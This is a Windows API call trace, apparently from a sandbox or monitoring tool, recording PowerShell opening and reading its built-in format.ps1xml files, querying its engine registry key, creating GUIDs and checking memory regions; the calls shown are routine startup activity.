	[0399.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0399.616] SetErrorMode (uMode=0x1) returned 0x1
	[0399.616] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c8
	[0399.617] GetFileType (hFile=0x1c8) returned 0x1
	[0399.617] SetErrorMode (uMode=0x1) returned 0x1
	[0399.617] GetFileType (hFile=0x1c8) returned 0x1
	[0399.617] ReadFile (in: hFile=0x1c8, lpBuffer=0x34b7310, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x34b7310*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0399.618] ReadFile (in: hFile=0x1c8, lpBuffer=0x34b7310, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x34b7310*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0399.618] ReadFile (in: hFile=0x1c8, lpBuffer=0x34b7310, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x34b7310*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0399.618] ReadFile (in: hFile=0x1c8, lpBuffer=0x34b7310, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x34b7310*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.081] ReadFile (in: hFile=0x1c8, lpBuffer=0x34b7310, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x34b7310*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.081] ReadFile (in: hFile=0x1c8, lpBuffer=0x34b7310, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x34b7310*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.081] ReadFile (in: hFile=0x1c8, lpBuffer=0x34b7310, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x34b7310*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.082] ReadFile (in: hFile=0x1c8, lpBuffer=0x34b7310, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x34b7310*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.082] ReadFile (in: hFile=0x1c8, lpBuffer=0x34b7310, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x34b7310*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.082] ReadFile (in: hFile=0x1c8, lpBuffer=0x34b7310, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x34b7310*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.083] ReadFile (in: hFile=0x1c8, lpBuffer=0x34b7310, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x34b7310*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.083] ReadFile (in: hFile=0x1c8, lpBuffer=0x34b7310, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x34b7310*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.083] ReadFile (in: hFile=0x1c8, lpBuffer=0x34b7310, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x34b7310*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.083] ReadFile (in: hFile=0x1c8, lpBuffer=0x34b7310, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x34b7310*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.084] ReadFile (in: hFile=0x1c8, lpBuffer=0x34b7310, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x34b7310*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.084] ReadFile (in: hFile=0x1c8, lpBuffer=0x34b7310, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x34b7310*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.085] ReadFile (in: hFile=0x1c8, lpBuffer=0x34b7310, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x34b7310*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.085] ReadFile (in: hFile=0x1c8, lpBuffer=0x34b7310, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x34b7310*, lpNumberOfBytesRead=0x28d478*=0xbce, lpOverlapped=0x0) returned 1
	[0400.085] ReadFile (in: hFile=0x1c8, lpBuffer=0x34b6a46, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x34b6a46*, lpNumberOfBytesRead=0x28d478*=0x0, lpOverlapped=0x0) returned 1
	[0400.085] ReadFile (in: hFile=0x1c8, lpBuffer=0x34b7310, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x34b7310*, lpNumberOfBytesRead=0x28d478*=0x0, lpOverlapped=0x0) returned 1
	[0400.086] CloseHandle (hObject=0x1c8) returned 1
	[0400.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0400.086] SetErrorMode (uMode=0x1) returned 0x1
	[0400.086] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d420 | out: lpFileInformation=0x28d420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0400.086] SetErrorMode (uMode=0x1) returned 0x1
	[0400.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0400.086] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d508 | out: phkResult=0x28d508*=0x1c8) returned 0x0
	[0400.086] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d48c, lpData=0x0, lpcbData=0x28d488*=0x0 | out: lpType=0x28d48c*=0x1, lpData=0x0, lpcbData=0x28d488*=0x56) returned 0x0
	[0400.086] CoTaskMemAlloc (cb=0x5a) returned 0x1885d0
	[0400.086] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d45c, lpData=0x1885d0, lpcbData=0x28d458*=0x56 | out: lpType=0x28d45c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28d458*=0x56) returned 0x0
	[0400.087] CoTaskMemFree (pv=0x1885d0) 
	[0400.087] RegCloseKey (hKey=0x1c8) returned 0x0
	[0400.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0400.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0400.090] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x2abee24e, Data2=0x270a, Data3=0x422a, Data4=([0]=0xb0, [1]=0xb8, [2]=0xdd, [3]=0x2a, [4]=0xec, [5]=0x3, [6]=0x95, [7]=0x94))) returned 0x0
	[0400.091] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x453907d0, Data2=0xc7aa, Data3=0x4b93, Data4=([0]=0xaa, [1]=0x2c, [2]=0xe, [3]=0x87, [4]=0xf0, [5]=0x81, [6]=0x87, [7]=0xcd))) returned 0x0
	[0400.092] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x3e24a27, Data2=0x1678, Data3=0x42f5, Data4=([0]=0xb3, [1]=0xc1, [2]=0x1c, [3]=0xcc, [4]=0x4a, [5]=0x70, [6]=0x42, [7]=0xef))) returned 0x0
	[0400.092] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x9826587e, Data2=0xd884, Data3=0x4c4e, Data4=([0]=0x88, [1]=0xbb, [2]=0x79, [3]=0xb, [4]=0xc3, [5]=0x2c, [6]=0xcf, [7]=0x2))) returned 0x0
	[0400.093] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x7df3a793, Data2=0x73c8, Data3=0x4622, Data4=([0]=0xae, [1]=0xaf, [2]=0x34, [3]=0xfa, [4]=0xf7, [5]=0x7b, [6]=0x3e, [7]=0x92))) returned 0x0
	[0400.093] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xa69b4db7, Data2=0xa55b, Data3=0x4b9f, Data4=([0]=0x88, [1]=0x1c, [2]=0xc0, [3]=0x47, [4]=0x9f, [5]=0x3f, [6]=0xd, [7]=0x8d))) returned 0x0
	[0400.094] VirtualQuery (in: lpAddress=0x28c0e0, lpBuffer=0x28cfa0, dwLength=0x30 | out: lpBuffer=0x28cfa0*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0400.095] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x1e85a322, Data2=0xe921, Data3=0x4d58, Data4=([0]=0x92, [1]=0x90, [2]=0xd9, [3]=0xca, [4]=0x4f, [5]=0x6, [6]=0x6, [7]=0xe6))) returned 0x0
	[0400.095] VirtualQuery (in: lpAddress=0x28c0e0, lpBuffer=0x28cfa0, dwLength=0x30 | out: lpBuffer=0x28cfa0*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0400.097] VirtualQuery (in: lpAddress=0x28c0e0, lpBuffer=0x28cfa0, dwLength=0x30 | out: lpBuffer=0x28cfa0*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0400.098] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x7cb78974, Data2=0x473, Data3=0x4f2e, Data4=([0]=0x94, [1]=0xfc, [2]=0xa7, [3]=0x67, [4]=0x90, [5]=0x69, [6]=0x54, [7]=0x43))) returned 0x0
	[0400.098] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xba053566, Data2=0x6541, Data3=0x44b4, Data4=([0]=0x9f, [1]=0xa4, [2]=0xca, [3]=0x37, [4]=0xe, [5]=0x24, [6]=0xf7, [7]=0x6b))) returned 0x0
	[0400.099] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x3799a092, Data2=0x1e95, Data3=0x4cff, Data4=([0]=0xaa, [1]=0x71, [2]=0xf6, [3]=0xbe, [4]=0x52, [5]=0xf6, [6]=0xa1, [7]=0x38))) returned 0x0
	[0400.099] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xff7bfe98, Data2=0x7084, Data3=0x4046, Data4=([0]=0x9f, [1]=0xc0, [2]=0x81, [3]=0x42, [4]=0xe0, [5]=0x34, [6]=0x9c, [7]=0x16))) returned 0x0
	[0400.099] VirtualQuery (in: lpAddress=0x28c0e0, lpBuffer=0x28cfa0, dwLength=0x30 | out: lpBuffer=0x28cfa0*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0400.099] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x4c23163c, Data2=0x5667, Data3=0x4e29, Data4=([0]=0xbd, [1]=0xac, [2]=0x29, [3]=0xaf, [4]=0x4, [5]=0x42, [6]=0x72, [7]=0x85))) returned 0x0
	[0400.099] VirtualQuery (in: lpAddress=0x28c0e0, lpBuffer=0x28cfa0, dwLength=0x30 | out: lpBuffer=0x28cfa0*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0400.099] VirtualQuery (in: lpAddress=0x28c0e0, lpBuffer=0x28cfa0, dwLength=0x30 | out: lpBuffer=0x28cfa0*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0400.100] VirtualQuery (in: lpAddress=0x28c0e0, lpBuffer=0x28cfa0, dwLength=0x30 | out: lpBuffer=0x28cfa0*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0400.100] VirtualQuery (in: lpAddress=0x28c0e0, lpBuffer=0x28cfa0, dwLength=0x30 | out: lpBuffer=0x28cfa0*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0400.100] VirtualQuery (in: lpAddress=0x28c0e0, lpBuffer=0x28cfa0, dwLength=0x30 | out: lpBuffer=0x28cfa0*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0400.101] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xb63284c9, Data2=0xa45f, Data3=0x4bd7, Data4=([0]=0x89, [1]=0xe7, [2]=0xae, [3]=0x45, [4]=0x21, [5]=0xff, [6]=0x9b, [7]=0x80))) returned 0x0
	[0400.101] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x12b28aab, Data2=0x4d3c, Data3=0x4ab7, Data4=([0]=0x95, [1]=0x80, [2]=0x9b, [3]=0xd7, [4]=0x50, [5]=0x7c, [6]=0x89, [7]=0x36))) returned 0x0
	[0400.101] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xf6e4c22b, Data2=0xb0d2, Data3=0x43cf, Data4=([0]=0xa2, [1]=0xd3, [2]=0x2, [3]=0x68, [4]=0xda, [5]=0x18, [6]=0x82, [7]=0xfb))) returned 0x0
	[0400.101] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xa1a761bd, Data2=0xafcf, Data3=0x44af, Data4=([0]=0xbd, [1]=0x21, [2]=0x2, [3]=0xe3, [4]=0x82, [5]=0x91, [6]=0x7e, [7]=0xb9))) returned 0x0
	[0400.101] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x47c8f8f7, Data2=0x2282, Data3=0x4bef, Data4=([0]=0x8d, [1]=0xdc, [2]=0x39, [3]=0x1, [4]=0x3, [5]=0x2f, [6]=0x46, [7]=0xdd))) returned 0x0
	[0400.101] VirtualQuery (in: lpAddress=0x28c3a0, lpBuffer=0x28d260, dwLength=0x30 | out: lpBuffer=0x28d260*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0400.101] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xa17240fe, Data2=0xf91c, Data3=0x4eb7, Data4=([0]=0xad, [1]=0x73, [2]=0xca, [3]=0x44, [4]=0x6a, [5]=0xca, [6]=0x36, [7]=0x7b))) returned 0x0
	[0400.102] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x8e797173, Data2=0xcae4, Data3=0x45a2, Data4=([0]=0x9a, [1]=0x60, [2]=0x2e, [3]=0x57, [4]=0x53, [5]=0x39, [6]=0xec, [7]=0xb3))) returned 0x0
	[0400.102] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xb0cf5990, Data2=0xd786, Data3=0x458b, Data4=([0]=0x91, [1]=0xc8, [2]=0x2b, [3]=0xff, [4]=0x9c, [5]=0x57, [6]=0x57, [7]=0xbd))) returned 0x0
	[0400.102] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xd083d8f, Data2=0x7632, Data3=0x4852, Data4=([0]=0xab, [1]=0xed, [2]=0xba, [3]=0x7f, [4]=0xfc, [5]=0x53, [6]=0x56, [7]=0xaf))) returned 0x0
	[0400.102] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x80feccd4, Data2=0x5cd, Data3=0x4860, Data4=([0]=0x81, [1]=0xd6, [2]=0xf4, [3]=0x3e, [4]=0x96, [5]=0xb0, [6]=0x85, [7]=0x6b))) returned 0x0
	[0400.102] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x593db0e5, Data2=0x1b83, Data3=0x4883, Data4=([0]=0xae, [1]=0xc3, [2]=0x71, [3]=0x4b, [4]=0x3e, [5]=0xdc, [6]=0x8e, [7]=0x87))) returned 0x0
	[0400.102] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x93f50915, Data2=0xcb6a, Data3=0x44b4, Data4=([0]=0x99, [1]=0xd8, [2]=0x4a, [3]=0xf9, [4]=0x74, [5]=0xe4, [6]=0x69, [7]=0xdd))) returned 0x0
	[0400.102] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xab7f5ad, Data2=0x8cb5, Data3=0x4270, Data4=([0]=0xb6, [1]=0x3f, [2]=0x12, [3]=0xd9, [4]=0xef, [5]=0xd7, [6]=0x44, [7]=0x9a))) returned 0x0
	[0400.103] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xd843799a, Data2=0x541c, Data3=0x4e80, Data4=([0]=0x8f, [1]=0x46, [2]=0x8e, [3]=0x87, [4]=0xe7, [5]=0x69, [6]=0x91, [7]=0x69))) returned 0x0
	[0400.103] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x68839b52, Data2=0x8910, Data3=0x4411, Data4=([0]=0xbe, [1]=0x90, [2]=0x90, [3]=0x45, [4]=0xcd, [5]=0xba, [6]=0x71, [7]=0xf5))) returned 0x0
	[0400.103] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xd572221a, Data2=0x44d3, Data3=0x4d04, Data4=([0]=0x8c, [1]=0x93, [2]=0x9, [3]=0x6, [4]=0xe2, [5]=0xa7, [6]=0xf0, [7]=0x87))) returned 0x0
	[0400.103] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xc3e5a4e3, Data2=0xc001, Data3=0x4b03, Data4=([0]=0x95, [1]=0x3c, [2]=0x73, [3]=0x15, [4]=0x51, [5]=0xe6, [6]=0x91, [7]=0xb4))) returned 0x0
	[0400.103] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xd1b78426, Data2=0x57f, Data3=0x426e, Data4=([0]=0xab, [1]=0x12, [2]=0xf8, [3]=0x35, [4]=0xa9, [5]=0xa6, [6]=0xbb, [7]=0x60))) returned 0x0
	[0400.103] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xa8c708b6, Data2=0xbf54, Data3=0x43af, Data4=([0]=0xb3, [1]=0x93, [2]=0xee, [3]=0xf9, [4]=0xce, [5]=0xfe, [6]=0xb2, [7]=0x68))) returned 0x0
	[0400.103] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x5051b5b4, Data2=0xe143, Data3=0x4e20, Data4=([0]=0x90, [1]=0x6, [2]=0x9a, [3]=0x47, [4]=0x1f, [5]=0xab, [6]=0x13, [7]=0xc1))) returned 0x0
	[0400.104] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xe3e7f1ec, Data2=0xc2f4, Data3=0x453b, Data4=([0]=0x9b, [1]=0x38, [2]=0x96, [3]=0x42, [4]=0xf6, [5]=0x5c, [6]=0x5f, [7]=0x14))) returned 0x0
	[0400.104] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xa3e2069a, Data2=0x5e5c, Data3=0x4751, Data4=([0]=0xa4, [1]=0x31, [2]=0x68, [3]=0x3e, [4]=0xee, [5]=0x5d, [6]=0x32, [7]=0x21))) returned 0x0
	[0400.104] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x76d9d2f5, Data2=0x248a, Data3=0x4dfc, Data4=([0]=0xa0, [1]=0xef, [2]=0xb5, [3]=0x21, [4]=0xeb, [5]=0x45, [6]=0xbc, [7]=0xe0))) returned 0x0
	[0400.104] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x1890f255, Data2=0x599a, Data3=0x4b53, Data4=([0]=0x89, [1]=0xe6, [2]=0x85, [3]=0x67, [4]=0x99, [5]=0x32, [6]=0xa4, [7]=0x20))) returned 0x0
	[0400.104] VirtualQuery (in: lpAddress=0x28c0e0, lpBuffer=0x28cfa0, dwLength=0x30 | out: lpBuffer=0x28cfa0*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0400.104] VirtualQuery (in: lpAddress=0x28c0e0, lpBuffer=0x28cfa0, dwLength=0x30 | out: lpBuffer=0x28cfa0*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0400.105] VirtualQuery (in: lpAddress=0x28c0e0, lpBuffer=0x28cfa0, dwLength=0x30 | out: lpBuffer=0x28cfa0*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0400.106] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x5af6a025, Data2=0xb7a, Data3=0x46f1, Data4=([0]=0x8a, [1]=0xfc, [2]=0x9, [3]=0x69, [4]=0xa1, [5]=0x8d, [6]=0xc8, [7]=0x11))) returned 0x0
	[0400.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0400.106] SetErrorMode (uMode=0x1) returned 0x1
	[0400.106] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c8
	[0400.106] GetFileType (hFile=0x1c8) returned 0x1
	[0400.106] SetErrorMode (uMode=0x1) returned 0x1
	[0400.106] GetFileType (hFile=0x1c8) returned 0x1
	[0400.106] ReadFile (in: hFile=0x1c8, lpBuffer=0x35c7db8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x35c7db8*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.108] ReadFile (in: hFile=0x1c8, lpBuffer=0x35c7db8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x35c7db8*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.108] ReadFile (in: hFile=0x1c8, lpBuffer=0x35c7db8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x35c7db8*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.108] ReadFile (in: hFile=0x1c8, lpBuffer=0x35c7db8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x35c7db8*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.109] ReadFile (in: hFile=0x1c8, lpBuffer=0x35c7db8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x35c7db8*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.109] ReadFile (in: hFile=0x1c8, lpBuffer=0x35c7db8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x35c7db8*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0400.109] ReadFile (in: hFile=0x1c8, lpBuffer=0x35c7db8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x35c7db8*, lpNumberOfBytesRead=0x28d478*=0x119, lpOverlapped=0x0) returned 1
	[0400.109] ReadFile (in: hFile=0x1c8, lpBuffer=0x35c7db8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x35c7db8*, lpNumberOfBytesRead=0x28d478*=0x0, lpOverlapped=0x0) returned 1
	[0400.109] CloseHandle (hObject=0x1c8) returned 1
